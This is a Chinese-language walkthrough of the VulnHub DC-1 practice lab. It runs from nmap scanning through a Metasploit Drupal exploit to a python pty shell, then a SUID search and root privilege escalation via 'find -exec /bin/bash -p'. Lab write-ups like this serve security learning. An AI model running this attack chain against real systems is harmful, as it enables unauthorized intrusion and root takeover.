DC-1打靶思路详解(vulnhub)
第一步:信息收集
nmap -sn 192.168.31.0/24
确定靶机IP为192.168.31.61
再次使用nmap对靶机IP进行详细扫描
nmap -p- -sV -sT -O 192.168.31.61
结果如下
第二步:WEB渗透
直接访问 http://192.168.31.61/
哦!!!好熟悉 之前在做 lampiao 这个靶机的时候碰到过
那我们直接上 msf
msfconsole
search drupal
use 1
set RHOSTS 192.168.31.61
run
成功!!!
第三步:后渗透
直接通过msf进行后渗透
进入交互环境
shell
然后用python增强交互环境
python -c "import pty;pty.spawn('/bin/bash')"
查看环境,看看能不能用脏牛进行提权
uname -a
gcc -v
好像可以,但经过尝试发现不行
那就看看是否可以通过利用SUID提权
find / -user root -perm -4000 -exec ls -ldb {} \;
find: 用于在文件系统中搜索文件和目录。
/: 表示从根目录开始进行搜索。
-user root: 搜索属主为root的文件。
-perm -4000: 搜索具有SetUID权限的文件。
-exec: 在找到的每个文件上执行指定的命令。
ls -ldb {} \;: 执行ls -ldb命令来显示找到的文件的详细信息。{}表示当前找到的文件,\;表示命令的结束。
发现有 find 那就可以进行提权,查看flag
find / -exec /bin/bash -p \;
必须要有-p参数
官方解释:
-p 只要真实用户 ID 和有效用户 ID 不匹配时就会被打开
个人理解:因为使用 find 执行 /bin/bash 真实用户 ID 是 www-data 用户,而有效 ID 是 root 所以会打开一个特权 shell
至此完结,撒花。